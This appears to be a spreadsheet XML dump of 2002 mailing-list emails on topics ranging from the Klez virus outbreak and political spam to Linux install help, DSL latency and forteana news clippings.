combination of pernicious approaches to go from PC to PC.Antivirus software makers Symantec and McAfee both report more than 
2000 new infections daily, with no sign of letup at press time. The 
British security firm MessageLabs estimates that 1 in every 300 
e-mail messages holds a variation of the Klez virus, and says that 
Klez has already surpassed last summer's SirCam as the most prolific 
virus ever.And some newer Klez variants aren't merely nuisances--they can carry 
other viruses in them that corrupt your data....http://www.pcworld.com/news/article/0,aid,103259,00.asp
_______________________________________________
Irregulars mailing list
Irregulars@tb.tf
http://tb.tf/mailman/listinfo/irregulars</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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fraiche.Stew
-- 
Stewart Smith
Scottish Microelectronics Centre, University of Edinburgh.
http://www.ee.ed.ac.uk/~sxs/
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; I just had to jump in here as Carbonara is one of my favourites to make and 
&gt; ask 
&gt; what the hell are you supposed to use instead of cream? Isn't it just basically a mixture of beaten egg and bacon (or pancetta, 
really)? You mix in the raw egg to the cooked pasta and the heat of the pasta 
cooks the egg. That's my understanding.Martin------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The Scotsman - 22 August 2002 Playboy wants to go out with a bang 
 AN AGEING Berlin playboy has come up with an unusual offer to lure women into
 his bed - by promising the last woman he sleeps with an inheritance of 250,000
 (Â£160,000). 
 Rolf Eden, 72, a Berlin disco owner famous for his countless sex partners,
 said he could imagine no better way to die than in the arms of an attractive
 young woman - preferably under 30. 
 "I put it all in my last will and testament - the last woman who sleeps with
 me gets all the money," Mr Eden told Bild newspaper. 
 "I want to pass away in the most beautiful moment of my life. First a lot of
 fun with a beautiful woman, then wild sex, a final orgasm - and it will all
 end with a heart attack and then IÂ’m gone." 
 Mr Eden, who is selling his nightclub this year, said applications should be
 sent in quickly because of his age. "It could end very soon," he said.
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">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That's one of the worst non-smiles ever.Stew
ps. Apologies if any of the list's Maine residents voted for this man, you won't 
do it again once you've seen this pic.-- 
Stewart Smith
Scottish Microelectronics Centre, University of Edinburgh.
http://www.ee.ed.ac.uk/~sxs/
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The Scotsman Thu 22 Aug 2002  Meaningful sentences 
 Tracey Lawson 
 If you ever wanted to look like "one of the most dangerous inmates in prison
 history", as one judge described Charles Bronson, nowÂ’s your chance. Bronson -
 the serial hostage taker, not the movie star - has written a health and
 fitness guide in which he shares some of the secrets behind his legendary
 muscle power. 
 Solitary Fitness - a title which bears testament to the fact that Bronson, 48,
 has spent 24 of his 28 prison years in solitary confinement - explains how he
 has turned himself into a lean, mean, fitness machine while living 23 hours a
 day in a space just 12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"ItÂ’s a joke and a big con and they call
 me a criminal!" You canÂ’t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MajestyÂ’s pleasure. 
 Jimmy Boyle, the Scots sculptor and novelist, discovered his artistic talents
 when he was sent to Barlinnie PrisonÂ’s famous special unit, which aimed to
 help inmates put their violent pasts behind them by teaching them how to
 express their emotions artistically. Boyle was sentenced to life for the
 murder of "Babs" Rooney in 1967. Once released, he moved to Edinburgh where he
 has become a respected artist. His first novel, Hero of the Underworld, was
 published in 1999 and his autobiography, A Sense of Freedom, was made into an
 award-winning film. 
 Hugh Collins was jailed for life in 1977 for the murder of William Mooney in
 Glasgow, and in his first year in Barlinnie prison stabbed three prison
 officers, earning him an extra seven-year sentence. But, after being
 transferred to the same unit that Boyle attended, he learned to sculpt and
 developed an interest in art. He later published Autobiography of a Murderer,
 a frank account of GlasgowÂ’s criminal culture in the 1960s, which received
 critical praise. 
 And Lord Archer doesnÂ’t seem to have had trouble continuing to write the books
 that have made him millions while in jail. He recently signed a three-book
 deal with Macmillan publishers worth a reported Â£10 million, and is no doubt
 scribbling away as we speak. 
 So why is it that men like Collins, Bronson and Boyle, who can be so
 destructive towards society on the outside, can become so creative once stuck
 on the inside? Steve Richards, BronsonÂ’s publisher, has published many books
 about criminal figures and believes the roots of this phenomenon are both
 pragmatic and profound. 
 He says: "Prison is sometimes the first time some criminals will ever have
 known a stable environment, and this can be the first time they have the
 chance to focus on their creative skills. 
 "It may also be the first time that they have really had the chance of an
 education, if their early years have been hard. It could be the first time
 anyone has offered them the chance to explore their creative talents." 
 However, Richards believes the reasons are also deeper than that. He says:
 "Once they are behind bars, the cold light of day hits them, and they examine
 the very essence of who they are. 
 "They ask themselves, am I a man who wants to be remembered for violence? Or
 am I a man who can contribute to society, who can be remembered for something
 good?" 
 Bronson - who was born Michael Gordon Peterson, but changed his name to that
 of the Hollywood star of the Death Wish films - has, so far, been remembered
 mainly for things bad. He was originally jailed for seven years for armed
 robbery in 1974, and has had a series of sentences added to his original term
 over the years as a result of attacking people in prison. In 2000 he was
 jailed for life after being convicted of holding a teacher hostage for nearly
 two days during a jail siege. 
 Standing five feet ten and a half inches tall and weighing 210lbs, he is
 renowned for his strength. He has bent metal cell doors with his bare hands
 and does up to 3,000 - yes, 3,000 - press-ups a day. As he puts it: "I can hit
 a man 20 times in four seconds, I can push 132 press ups in 60 seconds." 
 But judging by our current obsession with health and exercise, Solitary
 Fitness might be the book which will see BronsonÂ’s face sitting on every
 coffee table in the land. He might be the man to give us the dream body which
 so many so-called fitness gurus promise but fail to motivate us into. Because
 Bronson has learned to use words as powerfully as he can use his fists. 
 "All this crap about high-protein drinks, pills, diets, itÂ’s just a load of
 bollocks and a multi-million-pound racket," he writes, in what can only be
 described as a refreshingly honest style. "We can all be fat lazy bastards,
 itÂ’s our choice, IÂ’m sick of hearing and reading about excuses, if you stuff
 your face with shit you become shit, thatÂ’s logical to me." 
 As motivational mantras go, that might be just the kick up the, er, backside
 we all needed. 
 Solitary Fitness by Charles Bronson is published by Mirage Publishing and will
 be available in bookstores from October at Â£7.99
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>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</si>
  <si>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Hello, have you seen and discussed this article and his approach?Thank youhttp://www.paulgraham.com/spam.html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</si>
  <si>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Yes - great minds think alike. But even withput eval rules it would be very 
useful. It would allow us to respond quickly to spammer's tricks.Theo Van Dinter wrote:
&gt; On Thu, Aug 22, 2002 at 07:27:52AM -0700, Marc Perkel wrote:
&gt; 
&gt;&gt;Has anyone though of the idea of live updates of rules after release? The 
&gt;&gt;idea being that the user can run a cron job once a week or so and get the 
&gt;&gt;new default rule set. This would allow us to react faster to:
&gt; 
&gt; 
&gt; I suggested this a few months ago.  I don't remember the details of what
&gt; came out of it except that it would only be useful for non-eval rules
&gt; since those require code changes.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</si>
  <si>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Woohoo.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>SpamAssassin is hurting democracy!
Owen
---------------------------------------------------------------------------------------------------------------------http://www.bayarea.com/mld/mercurynews/news/opinion/3900215.htmInternet can level the political playing field
By Mike McCurry and Larry PurpuroNOT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votes.Just as technology is affecting every other area of communication, it 
has begun to affect the way political candidates communicate with voters.In this year's GOP gubernatorial primary, California Secretary of State 
Bill Jones, who faced better-funded candidates, acquired the e-mail 
addresses of more than a million potential California voters and sent 
each an unsolicited e-mail asking for support.That day, he might have chosen any of the more traditional -- and more 
expensive -- methods of contacting voters, such as direct mail, radio 
spots or TV ads. But he spent only about 2 cents per message, instead of 
35 cents or more per message for direct mail or in another medium.Had Jones chosen direct mail, radio or TV, that communication would have 
been equally ``unsolicited,'' as defined in the e-mail world. Few voters 
would have ``opted in'' to receive campaign information from Jones 
through any of those channels.The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field.No one likes commercial spam. It is irrelevant and untargeted and can be 
highly intrusive and even offensive. But as a sophisticated society, 
it's time to differentiate commercial spam from very different 
unsolicited e-mail sent by political candidates to voters.The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stamp to be 
taken off a list, and viewers must repeatedly endure TV ads.When a candidate lacks a large campaign war chest, he or she can use the 
Internet to provide constituents with information to better prepare them 
to perform their civic duty of casting educated votes. With more than 60 
percent of all potential voters in this country possessing e-mail 
accounts, it makes sense that political candidates use this medium.Candidates might avoid some of the tactical problems encountered by the 
Jones campaign if they use the technologies available today that better 
ensure quality of e-mail lists and target content to specific recipient 
groups.But the broader point remains. When a political candidate sends a voter 
an e-mail, that recipient can choose to delete the message without 
opening it, unsubscribe from the list, read it or even reply and engage 
the sender. That choice should belong to the voter -- not to anti-spam 
advocates whose efforts are better focused on commercial e-mail. 
Political candidates should be free to communicate with voters as best 
they can, and let voters decide what to do with that information.
--------------------------------------------------------------------------------
Mike McCurry, former press secretary for President Clinton, is CEO of an 
advocacy management and communications software company. Larry Purpuro, 
the former Republican National Committee deputy chief of staff, is 
founder and president of a political e-marketing firm. This was written 
for the Los Angeles Times. http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Hi all,apologies for the possible silly question (i don't think it is, but), 
but is Eircom's aDSL service NAT'ed?and what implications would that have for VoIP? I know there are 
difficulties with VoIP or connecting to clients connected to a NAT'ed 
network from the internet wild (i.e. machines with static, real IPs)any help pointers would be helpful,cheers
-- 
rgrds,
Bernard
-- 
Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "D.McMann"  wrote:
&gt; Robert Moaby, 33, who sent death threats to staff, was also jailed
&gt; for hoarding indecent pictures of children on his home computer.
&gt; =========
&gt; 
&gt; Hmm, if I didn't trust our government and secret police, I could 
look at
&gt; this another way....There is a bit of circumstantial evidence - apparently some MT 
listers were approached by him (via email) - a little research in 
dejanews/google groups showed a number of messages from him, clearly 
hoping to contact girls, appearing in "alt.teens" and similar groups -
 I just tried a Google Groups search on "Robert Moaby" and some of 
them came top of the list.Note for Marie - "MT" stands for Mark Thomas, a slightly slimmer, UK 
version of your Michael Moore - the mailing list is named after him. Rob
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>In a nutshell - Solaris is Suns own flavour of UNIX.&gt;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</si>
  <si>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 xml:space="preserve">Apols if this has been posted before:http://www.pinkpaperclips.net/subs/quiz2.htmlRob
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </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</si>
  <si>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explain...Kiall Mac Innes
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Apols if this has been posted before:
&gt; 
&gt; http://www.pinkpaperclips.net/subs/quiz2.html
&gt;
So, anyone who isn't Beaker?TimC
Meep------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>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time.John
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>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time.Why do you say Dell is cheaper than DNUK?It gets a bit complicated though!
http://www.levenez.com/unix/history.htmlPÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Hey, it's not easy being green.leslieLeslie Ellen Jones, Ph.D.
Jack of All Trades and Doctor of Folklore
lejones@ucla.edu"Truth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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; On Thu, 22 Aug 2002, John P. Looney wrote:
&gt; &gt;  Sun's hardware in general is more reliable,
&gt; ROFL. not in our experience.Well at least our Caps-Lock keys work:peter@staunton.ie said:
&gt; Another problem. I have a Dell branded keyboard and if I hit Caps-Lock
&gt; twice, the whole machine crashes (in Linux, not Windows) - even the on/
&gt; off switch is inactive, leaving me to reach for the power cable
&gt; instead.:-Pbauwolf@indigo.ie said:
&gt; as if he wanted Solaris 9 for x86, he'd be waiting a bit
erm... it runs Solaris x86 as standard...Cheers,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t>
  </si>
  <si>
    <t>&gt;                                 You have multiple generations of
&gt; peasants/squatters that cultivate and live on the lands almost as a
&gt; human parts of the property package.When I'd read that "getting legal title
can take 20 years", when I believe that
1 year ought to be more than sufficient,
(and helped by the Cairo reference) I'd
assumed that we were talking about the
urban poor.If I see people living in mansions, or
even in suburban subdivisions, I assume
they didn't have too much trouble with
their titles.If I see people living in shanties and
haphazard alleyways, I tend to assume
their parcels weren't exactly recorded
on the government maps, or paid for with
a bank loan, especially when nearby vacant
lots have shotgun wielding men presumably
intent on keeping them "development" free.Now,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problem.The obvious solution, at least to us
barking farting chihuahuas on FoRK, is
to "introduce market mechanisms".  It is
left as an exercise to come up with one
which works when many of the agents (are
perceived to) have negligible NPV.-Dave&gt;              [land reform] meant that all the agricultural producers had
&gt; to plant crops all the time (profitable or not) ...What happened to more highly-capitalized
land?  Putting in trees instead of crops
sounds like it might sidestep that.&gt; Mr. Long, I think you'd particularly enjoy the De Soto work.On the "to find" list.  Any chance of
an explanation of that "Bell Jar" in
the meantime?http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>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Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Thu, 22 Aug 2002, Joseph S. Barrera III wrote:
--]Why wait until you're dead? I'm sure there's enough carbon in
--]the fat from your typical liposuction job to make a decent diamond.So thats why I keep seeing DeBeers agents hovering around me.-tom(diamonds in the folds of my flesh)wsmf
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Joseph S. Barrera III wrote:&gt;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;-).Owen
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Update on this for anyone that's interested, and because I like closed 
threads... nothing worse than an infinite while loop, is there?I ended up formatting a floppy on my flatmate's (un-networked) P100 running 
FAT16 Win95, and mcopied the contents of the bootdisk across. Now I have a 
FAT16 Win98 install running alongside Slackware, and can play Metal Gear 
Solid when the mood takes me ;)/Ciaran.On Wednesday 21 August 2002 16:21, Ciaran Johnston wrote:
&gt; Dublin said:
&gt; &gt; If you copy the files from your disk to the c: partition and mark it as
&gt; &gt; active it should work ...
&gt;
&gt; Yeah, I figured that, but it doesn't seem to ... well, if that's the case
&gt; I'll give it another go tonight, maybe come back with some error messages.
&gt;
&gt; Just to clarify for those who didn't understand me initially - I have a
&gt; floppy drive installed, but it doesn't physically work. There's nowhere
&gt; handy to pick one up where I am, and I don't fancy waiting a few days for
&gt; one to arrive from Peats.
&gt;
&gt; Thanks for the answers,
&gt; Ciaran.
&gt;
&gt; &gt; You especially need io.sys, command.com and msdos.sys
&gt; &gt;
&gt; &gt; your cd driver .sys and read the autoexec.bat and config.sys files for
&gt; &gt; hints on what you did with your boot floppy 
&gt; &gt;
&gt; &gt; P
&gt; &gt;
&gt; &gt; On Wed, 2002-08-21 at 14:07, Ciaran Johnston wrote:
&gt; &gt;&gt; Hi folks,
&gt; &gt;&gt; The situation is this: at home, I have a PC with 2 10Gig HDDs, and no
&gt; &gt;&gt; (working) floppy drive. I have been running Linux solely for the last
&gt; &gt;&gt; year, but recently got the urge to, among other things, play some of
&gt; &gt;&gt; my Windoze games. I normally install the windows partition using a
&gt; &gt;&gt; boot floppy which I have conveniently zipped up, but I haven't any way
&gt; &gt;&gt; of writing or reading a floppy.
&gt; &gt;&gt; So, how do I go about:
&gt; &gt;&gt; 1. formatting a C: drive with system files (normally I would use
&gt; &gt;&gt; format /s c: from the floppy).
&gt; &gt;&gt; 2. Installing the CDROM drivers (my bootdisk (I wrote it many years
&gt; &gt;&gt; ago) does this normally).
&gt; &gt;&gt; 3. Booting from the partition?
&gt; &gt;&gt;
&gt; &gt;&gt; I wiped all my linux partitions from the first drive and created
&gt; &gt;&gt; partitions for Windows (HDA1) Slackware and RedHat. I used cfdisk for
&gt; &gt;&gt; this. I made the first drive (hda) bootable. I then installed the
&gt; &gt;&gt; windows partition in LILO and reran lilo (installed in MBR). I copied
&gt; &gt;&gt; the contents of boot.zip to my new windows partition and tried to boot
&gt; &gt;&gt; it - all I get is a garbled line of squiggles.
&gt; &gt;&gt;
&gt; &gt;&gt; Anyone any ideas? I can't think of anywhere in Athlone to get a new
&gt; &gt;&gt; floppy drive this evening...
&gt; &gt;&gt;
&gt; &gt;&gt; Thanks,
&gt; &gt;&gt; Ciaran.
&gt; &gt;&gt;
&gt; &gt;&gt;
&gt; &gt;&gt;
&gt; &gt;&gt; --
&gt; &gt;&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; &gt;&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
&gt; &gt;&gt; information. List maintainer: listmaster@linux.ie
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>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:)Chrishttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>An apparent quote from Dubya, from the Times (sent to me by my Dad):http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.html------------------------------------------------------------------------------
TONY BLAIR's special relationship with George W. Bush is under
considerable strain. Not only do the two disagree on Yassir Arafat's
tenure as leader of the Palestinian Authority, but Blair has started
telling disparaging anecdotes about the President.Baroness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don't have a word for entrepreneur.'
------------------------------------------------------------------------------R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>This is an automated response to a message you have sent to hauns_froehlingsdorf@infinetivity.com.I will be out of the office until Monday, August 26 2002.I will reply to your email when I return.Hauns___________________________________Hauns Froehlingsdorf
Network/Systems Manager
infinetivity, inc.
952-225.4200
http://www.infinetivity.com</t>
  </si>
  <si>
    <t>Al white wrote: &gt;erm... it runs Solaris x86 as standard...It runs Solaris 8 x86 as standard.
(I was joking Al)M.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,Thank you for the useful replies, I have found some interesting 
tutorials in the ibm developer connection.https://www6.software.ibm.com/developerworks/education/j-sec1andhttps://www6.software.ibm.com/developerworks/education/j-sec2Registration is needed.I will post the same message on the Web Application Security list, as 
suggested by someone.For now, I thing I will use md5 for password checking (I will use the 
approach described in secure programmin fo linux and unix how-to).I will separate the authentication module, so I can change its 
implementation at anytime.Thank you again!Mario Torre
-- 
Please avoid sending me Word or PowerPoint attachments.
See http://www.fsf.org/philosophy/no-word-attachments.html </t>
  </si>
  <si>
    <t>Mark Twomey joked:
&gt;  &gt;erm... it runs Solaris x86 as standard...
&gt;
&gt; It runs Solaris 8 x86 as standard.
&gt; (I was joking Al)And will run Solaris 9 when Sun catch up with the x86 drivers and kernel.Although don't hold your breath for the free DVD. It will never come.(Spot the person who applied for the free Solaris 9 DVD, only to be told
three months later it is no longer available.)FWIW Solaris and Linux seem to be getting closer all the time. I can no
longer see any specific reason why one is better than the other. Expect Red
Hat Solaris 11 any time now... - Matthew__________________________________________________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</si>
  <si>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On Thu, Aug 22, 2002 at 10:58:34PM +0200, Robert Harley wrote:
&gt; An apparent quote from Dubya, from the Times (sent to me by my Dad):
&gt; 
&gt; http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.htmlhttp://www.snopes.com/quotes/bush.htmClaim:   President George W. Bush proclaimed, "The problem with
the French is that they don't have a word for entrepreneur."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entrepreneur."The source was Shirley Williams, also known as the Baroness
Williams of Crosby, who claimed "my good friend Tony Blair" had
recently regaled her with this anecdote in Brighton.Lloyd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ears.Barbara "ears of corn" MikkelsonLast updated:   29 July 2002http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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mine...-----Original Message-----
From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of Peter
Staunton
Sent: 22 August 2002 19:58
To: ilug@linux.ie
Subject: [ILUG] Newbie seeks advice - Suse 7.2
Folks,my first time posting - have a bit of Unix experience, but am new to Linux.
Just got a new PC at home - Dell box with Windows XP. Added a second hard
disk
for Linux. Partitioned the disk and have installed Suse 7.2 from CD, which
went
fine except it didn't pick up my monitor.I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next?Another problem. I have a Dell branded keyboard and if I hit Caps-Lock
twice,
the whole machine crashes (in Linux, not Windows) - even the on/off switch
is
inactive, leaving me to reach for the power cable instead.If anyone can help me in any way with these probs., I'd be really grateful -
I've searched the 'net but have run out of ideas.Or should I be going for a different version of Linux such as RedHat?
Opinions
welcome.Thanks a lot,
Peter--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</si>
  <si>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At 17:10 22/08/2002 +0100, Nick Hilliard wrote:
&gt; &gt; apologies for the possible silly question (i don't think it is, but),
&gt; &gt; but is Eircom's aDSL service NAT'ed?
&gt;
&gt;No - you get unfiltered access with a real (but dynamic) IP address.
&gt;
&gt; &gt; and what implications would that have for VoIP? I know there are
&gt; &gt; difficulties with VoIP or connecting to clients connected to a NAT'ed
&gt; &gt; network from the internet wild (i.e. machines with static, real IPs)
&gt;
&gt;You will probably suffer from the high latency of DLS lines.  Typically,
&gt;you're talking about 50ms RTT to the local bas, which is pretty high.
&gt;If your voip application can handle this, then you're ok.
&gt;
&gt;Nickwhat's the deal with all this latency? it's not like that in other places 
where I've used dsl. i read some story about it being done that way to 
allow greater distances to be covered or something like that. however, my 
knowledge of physics is really only newtonian, and I don't understand how 
worsening latency could possibly improve the reliability of a 2000 foot 
long piece of copper. Perhaps it has something to do with stretching the 
time-space continuum? can someone explain this in words of five syllables 
or less?a.&gt;_______________________________________________
&gt;IIU mailing list
&gt;IIU@iiu.taint.org
&gt;http://iiu.taint.org/mailman/listinfo/iiu--Antoin O Lachtnain
**  antoin@eire.com ** http://www.eire.com ** +353-87-240-6691_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu</t>
  </si>
  <si>
    <t>Manoj Kasichainula wrote;
&gt;http://www.snopes.com/quotes/bush.htm
&gt;
&gt;Claim:   President George W. Bush proclaimed, "The problem with
&gt;the French is that they don't have a word for entrepreneur."
&gt;
&gt;Status:   False.&gt;Lloyd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joke."So some guy failed to reach the source, but instead got spin doctor to
deny it.  Wot, is he thick enough to expect official confirmation
that, yes, Blair is going around casting aspersions on Bush???It's an amusing anecdote, I don't know if it's true or not, but certainly
nothing here supports the authoritative sounding conclusion "Status: False".
R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Lucas Gonze:
&gt;Spam is *the* tool for dissident news, since the fact that it's unsolicited 
&gt;means that recipients can't be blamed for being on a mailing list.That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http://messenger.msn.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On 23 Aug 2002 at 2:57, Robert Harley wrote:&gt; It's an amusing anecdote, I don't know if it's true or not,
&gt; but certainly nothing here supports the authoritative
&gt; sounding conclusion "Status: False".I actually thought it was pretty funny and quite accurate.  Who cares if the spinmeisters are denying it?
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&lt; &gt;
&gt; I downloaded a driver from the nVidia website and installed it using RPM.
&gt; Then I ran Sax2 (as was recommended in some postings I found on the net),
but
&gt; it still doesn't feature my video card in the available list. What next?
hmmm.Peter.Open a terminal and as root type
lsmod
you want to find a module called
NVdriver.If it isn't loaded then load it.
#insmod NVdriver.o
Oh and ensure you have this module loaded on boot.... else when you reboot
you might be in for a nasty surprise.Once the kernel module is loaded#vim /etc/X11/XF86Configin the section marked
Driver I have "NeoMagic"
you need to have
Driver "nvidia"Here is part of my XF86ConfigAlso note that using the card you are using you 'should' be able to safely
use the FbBpp 32 option .Section "Module"
 Load  "extmod"
 Load  "xie"
 Load  "pex5"
 Load  "glx"
 SubSection "dri"    #You don't need to load this Peter.
  Option     "Mode" "666"
 EndSubSection
 Load  "dbe"
 Load  "record"
 Load  "xtrap"
 Load  "speedo"
 Load  "type1"
EndSection#Plus the Modelines for your monitor should be singfinicantly different.Section "Monitor"
 Identifier   "Monitor0"
 VendorName   "Monitor Vendor"
 ModelName    "Monitor Model"
 HorizSync    28.00-35.00
 VertRefresh  43.00-72.00
        Modeline "800x600" 36 800 824 896 1024 600 601 603 625
 Modeline "1024x768" 49 1024 1032 1176 1344 768 771 777 806
EndSectionSection "Device" Identifier  "Card0"
 Driver      "neomagic" #Change this to "nvidia"... making sure the modules
are in the correct path
 VendorName  "Neomagic" # "Nvidia"
 BoardName   "NM2160"
 BusID       "PCI:0:18:0"
EndSectionSection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
  </si>
  <si>
    <t>According to my son, it was actually Homer Simpson, who claimed the 
French had no word for victory.ChuckOn Thursday, August 22, 2002, at 01:58 PM, Robert Harley wrote:&gt; An apparent quote from Dubya, from the Times (sent to me by my Dad):
&gt;
&gt; http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.html
&gt;
&gt; ------------------------------------------------------------------------------
&gt; TONY BLAIR's special relationship with George W. Bush is under
&gt; considerable strain. Not only do the two disagree on Yassir Arafat's
&gt; tenure as leader of the Palestinian Authority, but Blair has started
&gt; telling disparaging anecdotes about the President.
&gt;
&gt; Baroness Williams of Crosby recalled a story told to her by 'my good
&gt; friend Tony Blair' recently in Brighton. Blair, Bush and Jacques
&gt; Chirac were discussing economics and, in particular, the decline of
&gt; the French economy. 'The problem with the French,' Bush confided in
&gt; Blair, 'is that they don't have a word for entrepreneur.'
&gt; ------------------------------------------------------------------------------
&gt;
&gt; R
&gt; http://xent.com/mailman/listinfo/fork
&gt;http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Whore eructed:
&gt;--]It's an amusing anecdote, I don't know if it's true or not, but
&gt;--]certainly nothing here supports the authoritative sounding conclusion
&gt;--]"Status: False".
&gt;
&gt;So thats the trick, just let any anecdotal utterances you LIKE be deemed
&gt;true [...]Exsqueeze me, but what part of "I don't know if it's true or not"
did you fail to grok?  I personally doubt it simply because I never
heard of Bush and Chirac going to Brighton.Next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http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I won't be reading email until Sunday night or so.  Good luck with
2.40 and don't do anything I wouldn't do.  ;-)- Dan</t>
  </si>
  <si>
    <t>It will function as a router if that is what you wish.It even looks like the modem's embedded OS is some kind of linux, being that
it has interesting interfaces like eth0.I don't use it as a router though.... I just have it do the absolute minimum
DSL stuff and do all the really fun stuff like pppoe on my linux box........Also the manual tells you what the default password is.Don't forget to run pppoe over the alcatel speedtouch 350i as in my case you
'HAVE TO' have a bridge configured in the router/modem's software........
This lists your VCI values etc.
&gt; Also, does anyone know if the high-end SpeedTouch, with
&gt; 4 ethernet ports, can act as a full router or do I still
&gt; need to run a pppoe stack on the linux box?
&gt;
&gt; Regards,
&gt;
&gt; Vin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</si>
  <si>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 xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson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hundred-thousand-hectares).It's still curious Iceland leads.  Maybe there's just a deep cultural
curiousity and fascination with watching advertising from the rest of
the world. Maybe they're downloading Bjork videos.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
